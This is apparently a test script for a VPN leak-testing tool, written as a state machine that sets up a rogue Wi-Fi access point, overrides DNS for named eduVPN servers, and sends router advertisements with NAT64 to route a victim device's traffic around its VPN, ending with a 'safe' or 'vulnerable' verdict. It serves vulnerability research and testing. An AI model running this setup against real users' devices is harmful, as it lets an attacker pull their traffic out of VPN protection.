(*
 * Localnet state machine definition
 * Our target falls within the local subnet range.
 * i.e. the IP addresses we hand out are within a public range.
 * We abuse the fact that most vpn clients allow local subnet traffic to flow directly.
 *)

state init begin:
  miscnet = miscnet();
  my_ip_v6 = "2a00:1338:1:1::1";
  prefix_len_v6 = "64";
  endpoint_nl = miscnet.lookup_ipv6("ams.nl.eduvpn.org");
  endpoint_no = miscnet.lookup_ipv6("tekno-vpn.guest.eduvpn.no");
  endpoint_no2 = miscnet.lookup_ipv6("ifi2-vpn.guest.eduvpn.no");
  endpoint_lk = miscnet.lookup_ipv6("eduvpn.ac.lk");
  endpoint_ma = miscnet.lookup_ipv6("eduvpn.marwan.ma");

  target_ip = miscnet.lookup_ipv4("vvts.midnightblue.nl");

  (* perform nat on the interface where our default gateway is at *)
  miscnet.masquerade("true");

  ap = accesspoint();
  ap.wifi_interface = "wlan0";
  ap.dhcp4_enable = "false";
  ap.dns_enable = "true";
  ap.dns_set_override("ams.nl.eduvpn.org", endpoint_nl);
  ap.dns_set_override("tekno-vpn.guest.eduvpn.no", endpoint_no);
  ap.dns_set_override("ifi2-vpn.guest.eduvpn.no", endpoint_no2);
  ap.dns_set_override("eduvpn.ac.lk", endpoint_lk);
  ap.dns_set_override("eduvpn.marwan.ma", endpoint_ma);

  ap.dns_set_override("vvts.midnightblue.nl", target_ip);

  ap.ipv6_addr = my_ip_v6;
  ap.ipv6_prefixlen = prefix_len_v6;
  ap.slaac_enable = "true";
  (* ap.slaac_dns = "2001:4860:4860::8888"; *)
  ap.slaac_dns = my_ip_v6;
  (* enable 6->4 network address translation *)
  ap.nat64_enable = "false";
  ap.bring_up(ap_up, ap_err);

state ap_err:
  exit("failed to bring up access point: ", errstr);

state ap_up:
  mon = trafficmonitor();
  mon.interface = ap.ap_interface;
  (* specify vpn endpoints so that the monitor can detect whether vpn traffic occurs *)
  endpoints = "tcp://ams.nl.eduvpn.org:443;udp://ams.nl.eduvpn.org:443";
  endpoints = concat(endpoints, ";udp://ifi2-vpn.guest.eduvpn.no:1194");
  endpoints = concat(endpoints, ";udp://tekno-vpn.guest.eduvpn.no:1194");
  endpoints = concat(endpoints, ";udp://eduvpnga.ethernet.edu.et:1194");
  endpoints = concat(endpoints, ";udp://eduvpn.ac.lk:1194");
  endpoints = concat(endpoints, ";udp://eduvpn.marwan.ma:1194");
  mon.vpn_endpoints = endpoints;
  mon.detect_vpn(vpn_detected, mon_err);
  print("[i] Please connect to the vpn on the victim device");

state mon_err:
  exit("Error occurred: ", errstr);

state vpn_detected:
  print("[+] detected a vpn connection -> proceding");
  ap.slaac_enable = "true";
  ap.nat64_enable = "true";
  ap.nat64_reload();
  ap.slaac_renew(slaac_renew);
  print("[i] Sending Router Advertisement...");

state slaac_renew:
  mon.validation_server = "https://vvts.midnightblue.nl:8443/";
  mon.detect_attack(vpn_safe, vpn_vuln, mon_err);

state vpn_safe:
  exit("Your vpn appears to be safe, congratulations!");

state vpn_vuln:
  exit("Your vpn appears to be vulnerable!");
